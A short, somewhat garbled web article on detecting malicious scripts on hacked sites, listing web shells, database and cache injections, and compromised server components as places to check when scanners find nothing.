Modern malicious and hacker scripts are significantly different from those of 3-5 years ago. Now developers of malicious code mix obfuscation, encryption, decomposition, external loading of malicious code, etc. in order to cheat scanners and antiviruses. Consequently, the recognition of malicious code by scanners and antiviruses has fallen dramatically.
What should be done to more efficiently detect viruses and hacker script on the site? You need to do an automated scan first, and then do a manual analysis.
First, let's look at what exactly to look for when hacking.
1. Hacker scripts. Most often, when hacked, files are downloaded that are web shells,
backdoors, loaders, scripts for spam mailings, phishing pages + form handlers, doorways and hacking token files.
3.Injections in the database. The database is the third target for a hacker. Here, static inserts,,, are possible, which redirect visitors to third-party resources, "spy" on them, or infect the visitor's computer | mobile device as a result of a drive-by attack (attack using hidden download). In addition, in many modern CMS (IPB, vBulletin, modx, etc.), templating tools allow you to execute php code, and the templates themselves are stored in the database, so the php code of web shells and backdoors can be embedded directly into the database.
Injections in caching services.
4. As a result of incorrect or unsafe configuration of caching services, for example, memcached, injections into cached data are possible “on the fly”. In some cases, a hacker can inject malicious code into website pages without directly breaking the latter. Injects / incited items in server system components.
5. If a hacker gains root access to the server, he can replace the elements of the web server or caching server with infected ones. Such a web server will, on the one hand, provide control over the server using control commands, and on the other hand, from time to time, it will inject dynamic redirects and malicious code into website pages. As in the case of an injection into a caching service, the site administrator will most likely not be able to detect the fact of a hacked site, since all files and the database will be original. This option is the most difficult to treat.
So, let's say that you have already checked the files on the hosting and the database dump with scanners, but they did not find anything, and the viral redirect is still on the page or the mobile redirect continues to work when the pages are opened. How to look further?